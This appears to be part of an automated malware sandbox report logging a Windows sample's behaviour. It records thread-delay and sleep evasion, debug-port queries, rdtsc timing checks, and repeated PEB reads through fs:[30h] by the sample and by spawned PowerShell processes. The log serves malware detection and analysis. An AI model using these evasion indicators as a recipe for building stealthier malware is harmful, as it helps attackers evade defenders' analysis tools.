Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 7280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 84D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 94D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 8_2_0163096E rdtsc

8_2_0163096E

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5555	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5875	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Window / User API: threadDelayed 2042
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Window / User API: threadDelayed 7930

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	API coverage: 0.3 %

Source: C:\Users\user\Desktop\FGGx944Qu7.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep count: 5555 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep count: 194 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe TID: 7804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep count: 2042 > 30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep time: -4084000s >= -30000s
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep count: 7930 > 30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1072	Thread sleep time: -15860000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: usFxdnRPYjnb.exe, 00000013.00000002.2863023876.00000000012A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: firefox.exe, 00000014.00000002.2544008849.00000282D43FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::k
Source: SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO&i

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 8_2_0163096E rdtsc

8_2_0163096E

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 8_2_00417393 LdrLoadDll,

8_2_00417393

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC156 mov eax, dword ptr fs:[00000030h]	8_2_015EC156
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6154 mov eax, dword ptr fs:[00000030h]	8_2_015F6154
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6154 mov eax, dword ptr fs:[00000030h]	8_2_015F6154
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]	8_2_01684144
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]	8_2_01684144
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov ecx, dword ptr fs:[00000030h]	8_2_01684144
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]	8_2_01684144
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01684144 mov eax, dword ptr fs:[00000030h]	8_2_01684144
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01688158 mov eax, dword ptr fs:[00000030h]	8_2_01688158
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620124 mov eax, dword ptr fs:[00000030h]	8_2_01620124
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov eax, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E10E mov ecx, dword ptr fs:[00000030h]	8_2_0169E10E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov ecx, dword ptr fs:[00000030h]	8_2_0169A118
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov eax, dword ptr fs:[00000030h]	8_2_0169A118
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov eax, dword ptr fs:[00000030h]	8_2_0169A118
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118 mov eax, dword ptr fs:[00000030h]	8_2_0169A118
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B0115 mov eax, dword ptr fs:[00000030h]	8_2_016B0115
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C61E5 mov eax, dword ptr fs:[00000030h]	8_2_016C61E5
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016201F8 mov eax, dword ptr fs:[00000030h]	8_2_016201F8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B61C3 mov eax, dword ptr fs:[00000030h]	8_2_016B61C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B61C3 mov eax, dword ptr fs:[00000030h]	8_2_016B61C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0166E1D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0166E1D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov ecx, dword ptr fs:[00000030h]	8_2_0166E1D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0166E1D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E1D0 mov eax, dword ptr fs:[00000030h]	8_2_0166E1D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA197 mov eax, dword ptr fs:[00000030h]	8_2_015EA197
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA197 mov eax, dword ptr fs:[00000030h]	8_2_015EA197
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA197 mov eax, dword ptr fs:[00000030h]	8_2_015EA197
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AC188 mov eax, dword ptr fs:[00000030h]	8_2_016AC188
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AC188 mov eax, dword ptr fs:[00000030h]	8_2_016AC188
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01630185 mov eax, dword ptr fs:[00000030h]	8_2_01630185
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694180 mov eax, dword ptr fs:[00000030h]	8_2_01694180
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694180 mov eax, dword ptr fs:[00000030h]	8_2_01694180
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]	8_2_0167019F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]	8_2_0167019F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]	8_2_0167019F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167019F mov eax, dword ptr fs:[00000030h]	8_2_0167019F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2050 mov eax, dword ptr fs:[00000030h]	8_2_015F2050
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161C073 mov eax, dword ptr fs:[00000030h]	8_2_0161C073
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676050 mov eax, dword ptr fs:[00000030h]	8_2_01676050
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686030 mov eax, dword ptr fs:[00000030h]	8_2_01686030
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01674000 mov ecx, dword ptr fs:[00000030h]	8_2_01674000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000 mov eax, dword ptr fs:[00000030h]	8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]	8_2_0160E016
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]	8_2_0160E016
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]	8_2_0160E016
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E016 mov eax, dword ptr fs:[00000030h]	8_2_0160E016
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA020 mov eax, dword ptr fs:[00000030h]	8_2_015EA020
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC020 mov eax, dword ptr fs:[00000030h]	8_2_015EC020
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016760E0 mov eax, dword ptr fs:[00000030h]	8_2_016760E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016320F0 mov ecx, dword ptr fs:[00000030h]	8_2_016320F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC0F0 mov eax, dword ptr fs:[00000030h]	8_2_015EC0F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F80E9 mov eax, dword ptr fs:[00000030h]	8_2_015F80E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016720DE mov eax, dword ptr fs:[00000030h]	8_2_016720DE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA0E3 mov ecx, dword ptr fs:[00000030h]	8_2_015EA0E3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016880A8 mov eax, dword ptr fs:[00000030h]	8_2_016880A8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B60B8 mov eax, dword ptr fs:[00000030h]	8_2_016B60B8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B60B8 mov ecx, dword ptr fs:[00000030h]	8_2_016B60B8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F208A mov eax, dword ptr fs:[00000030h]	8_2_015F208A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169437C mov eax, dword ptr fs:[00000030h]	8_2_0169437C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01672349 mov eax, dword ptr fs:[00000030h]	8_2_01672349
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA352 mov eax, dword ptr fs:[00000030h]	8_2_016BA352
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01698350 mov ecx, dword ptr fs:[00000030h]	8_2_01698350
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]	8_2_0167035C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]	8_2_0167035C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]	8_2_0167035C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov ecx, dword ptr fs:[00000030h]	8_2_0167035C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]	8_2_0167035C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167035C mov eax, dword ptr fs:[00000030h]	8_2_0167035C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC310 mov ecx, dword ptr fs:[00000030h]	8_2_015EC310
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A30B mov eax, dword ptr fs:[00000030h]	8_2_0162A30B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A30B mov eax, dword ptr fs:[00000030h]	8_2_0162A30B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A30B mov eax, dword ptr fs:[00000030h]	8_2_0162A30B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610310 mov ecx, dword ptr fs:[00000030h]	8_2_01610310
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016003E9 mov eax, dword ptr fs:[00000030h]	8_2_016003E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0 mov eax, dword ptr fs:[00000030h]	8_2_0160E3F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0 mov eax, dword ptr fs:[00000030h]	8_2_0160E3F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0 mov eax, dword ptr fs:[00000030h]	8_2_0160E3F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016263FF mov eax, dword ptr fs:[00000030h]	8_2_016263FF
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]	8_2_015F83C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]	8_2_015F83C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]	8_2_015F83C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F83C0 mov eax, dword ptr fs:[00000030h]	8_2_015F83C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	8_2_015FA3C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	8_2_015FA3C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	8_2_015FA3C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	8_2_015FA3C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	8_2_015FA3C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA3C0 mov eax, dword ptr fs:[00000030h]	8_2_015FA3C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AC3CD mov eax, dword ptr fs:[00000030h]	8_2_016AC3CD
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016763C0 mov eax, dword ptr fs:[00000030h]	8_2_016763C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov eax, dword ptr fs:[00000030h]	8_2_0169E3DB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov eax, dword ptr fs:[00000030h]	8_2_0169E3DB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov ecx, dword ptr fs:[00000030h]	8_2_0169E3DB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169E3DB mov eax, dword ptr fs:[00000030h]	8_2_0169E3DB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016943D4 mov eax, dword ptr fs:[00000030h]	8_2_016943D4
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016943D4 mov eax, dword ptr fs:[00000030h]	8_2_016943D4
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8397 mov eax, dword ptr fs:[00000030h]	8_2_015E8397
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8397 mov eax, dword ptr fs:[00000030h]	8_2_015E8397
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8397 mov eax, dword ptr fs:[00000030h]	8_2_015E8397
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE388 mov eax, dword ptr fs:[00000030h]	8_2_015EE388
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE388 mov eax, dword ptr fs:[00000030h]	8_2_015EE388
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE388 mov eax, dword ptr fs:[00000030h]	8_2_015EE388
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161438F mov eax, dword ptr fs:[00000030h]	8_2_0161438F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161438F mov eax, dword ptr fs:[00000030h]	8_2_0161438F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6259 mov eax, dword ptr fs:[00000030h]	8_2_015F6259
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EA250 mov eax, dword ptr fs:[00000030h]	8_2_015EA250
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274 mov eax, dword ptr fs:[00000030h]	8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01678243 mov eax, dword ptr fs:[00000030h]	8_2_01678243
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01678243 mov ecx, dword ptr fs:[00000030h]	8_2_01678243
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E826B mov eax, dword ptr fs:[00000030h]	8_2_015E826B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA250 mov eax, dword ptr fs:[00000030h]	8_2_016AA250
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA250 mov eax, dword ptr fs:[00000030h]	8_2_016AA250
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4260 mov eax, dword ptr fs:[00000030h]	8_2_015F4260
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4260 mov eax, dword ptr fs:[00000030h]	8_2_015F4260
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4260 mov eax, dword ptr fs:[00000030h]	8_2_015F4260
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E823B mov eax, dword ptr fs:[00000030h]	8_2_015E823B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002E1 mov eax, dword ptr fs:[00000030h]	8_2_016002E1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002E1 mov eax, dword ptr fs:[00000030h]	8_2_016002E1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002E1 mov eax, dword ptr fs:[00000030h]	8_2_016002E1
